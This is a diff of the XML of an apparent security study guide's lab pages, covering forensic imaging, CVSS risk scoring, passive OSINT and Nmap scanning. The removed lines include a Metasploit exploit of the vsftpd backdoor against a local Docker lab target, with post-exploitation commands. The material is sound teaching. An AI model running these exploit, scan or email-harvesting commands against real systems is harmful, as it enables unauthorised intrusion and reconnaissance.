+        <w:t>Full step-by-step commands and references are in labs/lab-42-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 43 — Digital Forensics — Evidence Acquisition &amp; Hashing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Acquire a forensic image with a verifiable chain of custody.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner acquires a bit-for-bit forensic image of evidence media, hashes it for integrity, recovers a deleted artefact, and records the chain of custody.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A forensic image with matching acquisition/verification hashes and a recovered deleted file.   (Tools: dd, sha256sum, foremost, mmls.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Step-by-step</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7653,7 +11345,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Harvest emails and hosts</w:t>
+        <w:t>Prepare evidence media with a file, then delete it</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7663,7 +11355,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>theHarvester -d $TARGET -b crtsh,duckduckgo,bing 2&gt;/dev/null | tail -30</w:t>
+        <w:t>dd if=/dev/zero of=/ev.img bs=1M count=20; mkfs.ext4 /ev.img; mkdir -p /m; mount /ev.img /m; echo secret &gt; /m/evidence.txt; rm /m/evidence.txt; umount /m</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7671,7 +11363,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Pull certificate transparency records</w:t>
+        <w:t>Acquire a bit-for-bit image</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7681,7 +11373,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s "https://crt.sh/?q=%25.$TARGET&amp;output=json" | jq -r '.[].name_value' | sort -u | head -20</w:t>
+        <w:t>dd if=/ev.img of=/case01.dd bs=512 conv=noerror,sync</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7689,7 +11381,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Build the recon report</w:t>
+        <w:t>Hash the image on acquisition</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7699,7 +11391,61 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat recon-$TARGET.md</w:t>
+        <w:t>sha256sum /case01.dd | tee /case01.sha256</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Recover the deleted artefact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>apt install -y foremost &amp;&amp; foremost -i /case01.dd -o /recovered 2&gt;&amp;1 | tail -3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Re-verify the image hash is unchanged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>sha256sum -c /case01.sha256</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Record the chain of custody</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>echo "Collected by: &lt;analyst&gt;  Date: &lt;UTC&gt;  Hash: $(cut -d" " -f1 /case01.sha256)"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7714,7 +11460,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>recon-example.com.md lists the subdomain count plus DMARC and SPF records.</w:t>
+        <w:t>The acquisition and verification hashes match, and foremost recovers file data from the image.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="38" name="Picture 38"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-43.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId46"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 43 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7729,26 +11527,21 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Full step-by-step commands and references are in labs/lab-32-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+        <w:t>Full step-by-step commands and references are in labs/lab-43-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lab 33 — Active Reconnaissance with Nmap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Fingerprint a host with Nmap scans and NSE scripts.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Fingerprint a local host with Nmap host discovery, version detection, OS detection, and NSE scripts.</w:t>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Domain 05 — Security Program Management &amp; Oversight  (20%)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Governance · Risk &amp; CVSS · Third-party risk · Compliance · Audits &amp; pentesting · Awareness</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7758,12 +11551,57 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>What you'll build</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Nmap scan of local nginx and SSH targets   (Tools: nmap, nginx, openssh-server.)</w:t>
+        <w:t>Key concepts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Governance sets direction: policies, standards, procedures and guidelines assign accountability for security outcomes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Risk management records threats in a register, scores them (CVSS, likelihood × impact) and drives treatment decisions; third-party risk extends this to vendors.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Reconnaissance — passive OSINT and active scanning with Nmap — maps an organisation's exposure the way an attacker would; penetration testing safely validates exploitability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Oversight proves control effectiveness through compliance auditing (OpenSCAP/CIS) and measurable security-awareness testing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 31 — Risk Register, CVSS Scoring, and Quantitative Risk</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Build a risk register and score with CVSS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Build a CSV risk register, score findings with CVSS v3.1, and calculate ALE to justify control spend.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7773,6 +11611,21 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CSV risk register with CVSS and ALE math   (Tools: python3, FIRST.org CVSS calculator, column, bash.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
         <w:t>Step-by-step</w:t>
       </w:r>
     </w:p>
@@ -7781,7 +11634,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Install nmap and start nginx + ssh targets</w:t>
+        <w:t>Create and view the CSV risk register</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7791,7 +11644,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>apt install -y nmap nginx openssh-server</w:t>
+        <w:t>column -t -s, risk-register.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7799,7 +11652,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Discover live hosts with a ping scan</w:t>
+        <w:t>Score R-001 on the FIRST.org CVSS v3.1 calculator</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7809,7 +11662,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -sn 127.0.0.0/30</w:t>
+        <w:t>https://www.first.org/cvss/calculator/3.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7817,7 +11670,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Run a TCP SYN half-open scan</w:t>
+        <w:t>Compute SLE and ALE in Python</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7827,7 +11680,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -sS -p 1-1024 127.0.0.1</w:t>
+        <w:t>python3 -c "print(200000*0.6*0.5)"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7835,7 +11688,15 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Detect service versions</w:t>
+        <w:t>Choose a risk treatment (mitigate vs accept)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Add Key Risk Indicators to a CSV</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7845,7 +11706,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -sV -p 22,80 127.0.0.1</w:t>
+        <w:t>column -t -s, kri.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7853,7 +11714,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Fingerprint the OS</w:t>
+        <w:t>Generate the one-page board risk report</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7863,7 +11724,133 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -O 127.0.0.1</w:t>
+        <w:t>cat board-report.md</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The Python output shows ALE 60,000/year and board-report.md lists 4 open risks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="39" name="Picture 39"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-31.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId47"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 31 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-31-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 32 — Passive Reconnaissance / OSINT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Collect a domain footprint using only passive tools.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Gather a domain's public footprint with passive OSINT tools that never send packets to the target.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Passive recon report of an authorised domain   (Tools: whois, dnsutils, theHarvester, subfinder, jq, crt.sh.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Step-by-step</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7871,7 +11858,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Run NSE discovery scripts</w:t>
+        <w:t>Install theHarvester and subfinder</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7881,7 +11868,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap --script=banner,http-headers,ssh2-enum-algos -p 22,80 127.0.0.1</w:t>
+        <w:t>pip3 install --break-system-packages git+https://github.com/laramies/theHarvester.git</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7889,7 +11876,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Run vulnerability NSE scripts</w:t>
+        <w:t>Set the authorised target domain</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7899,7 +11886,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap --script=vuln -p 80 127.0.0.1</w:t>
+        <w:t>TARGET=example.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7907,7 +11894,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Save results in three report formats</w:t>
+        <w:t>Query WHOIS registrant and dates</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7917,7 +11904,97 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -sV -oA scan-127 127.0.0.1</w:t>
+        <w:t>whois $TARGET | grep -Ei "registrar|registrant|expiry|name server" | head</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Enumerate DNS records (MX, TXT, NS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>dig +short MX $TARGET</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Discover subdomains passively with subfinder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>subfinder -silent -d $TARGET | tee subs.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Harvest emails and hosts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>theHarvester -d $TARGET -b crtsh,duckduckgo,bing 2&gt;/dev/null | tail -30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pull certificate transparency records</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>curl -s "https://crt.sh/?q=%25.$TARGET&amp;output=json" | jq -r '.[].name_value' | sort -u | head -20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Build the recon report</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>cat recon-$TARGET.md</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7932,7 +12009,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>nmap -sV reports nginx on port 80 and OpenSSH on port 22, and scan-127.xml is written.</w:t>
+        <w:t>recon-example.com.md lists the subdomain count plus DMARC and SPF records.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="40" name="Picture 40"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-32.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 32 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7947,7 +12076,7 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Full step-by-step commands and references are in labs/lab-33-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+        <w:t>Full step-by-step commands and references are in labs/lab-32-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7956,17 +12085,17 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Lab 34 — Penetration Testing with Metasploit (Authorised Lab)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Exploit a vulnerable target and write the report.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Exploit a deliberately vulnerable vsftpd service with Metasploit, prove compromise, then write the report.</w:t>
+        <w:t>Lab 33 — Active Reconnaissance with Nmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Fingerprint a host with Nmap scans and NSE scripts.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Fingerprint a local host with Nmap host discovery, version detection, OS detection, and NSE scripts.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7981,7 +12110,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Metasploit exploit of a lab FTP container   (Tools: metasploit-framework, docker.io, nmap.)</w:t>
+        <w:t>Nmap scan of local nginx and SSH targets   (Tools: nmap, nginx, openssh-server.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7999,7 +12128,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Install Metasploit via the Rapid7 installer script</w:t>
+        <w:t>Install nmap and start nginx + ssh targets</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8009,7 +12138,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -sSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; /tmp/msfinstall</w:t>
+        <w:t>apt install -y nmap nginx openssh-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8017,7 +12146,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Stand up the vulnerable FTP target in Docker</w:t>
+        <w:t>Discover live hosts with a ping scan</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8027,7 +12156,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>docker run -d --name vuln -p 2121:21 --rm tleemcjr/metasploitable2 /bin/bash -c "service vsftpd start &amp;&amp; sleep infinity"</w:t>
+        <w:t>nmap -sn 127.0.0.0/30</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8035,7 +12164,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Recon the target service banner</w:t>
+        <w:t>Run a TCP SYN half-open scan</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8045,7 +12174,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nmap -sV -p 2121 127.0.0.1</w:t>
+        <w:t>nmap -sS -p 1-1024 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8053,7 +12182,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Search Metasploit for matching modules</w:t>
+        <w:t>Detect service versions</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8063,7 +12192,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>msfconsole -q -x "search vsftpd; exit"</w:t>
+        <w:t>nmap -sV -p 22,80 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8071,7 +12200,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Run the vsftpd backdoor exploit</w:t>
+        <w:t>Fingerprint the OS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8081,7 +12210,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 127.0.0.1; set RPORT 2121; exploit -z; exit"</w:t>
+        <w:t>nmap -O 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8089,7 +12218,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Collect post-exploitation proof (id, uname)</w:t>
+        <w:t>Run NSE discovery scripts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8099,7 +12228,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>sessions -i 1 -c 'id; uname -a; whoami; hostname'</w:t>
+        <w:t>nmap --script=banner,http-headers,ssh2-enum-algos -p 22,80 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8107,7 +12236,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Clean up the target container</w:t>
+        <w:t>Run vulnerability NSE scripts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8117,7 +12246,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>docker rm -f vuln</w:t>
+        <w:t>nmap --script=vuln -p 80 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8125,7 +12254,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Write the engagement report</w:t>
+        <w:t>Save results in three report formats</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8135,7 +12264,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat pentest-report.md</w:t>
+        <w:t>nmap -sV -oA scan-127 127.0.0.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8150,7 +12279,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>A command session opens and `id` returns uid=0(root) from the target container.</w:t>
+        <w:t>nmap -sV reports nginx on port 80 and OpenSSH on port 22, and scan-127.xml is written.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
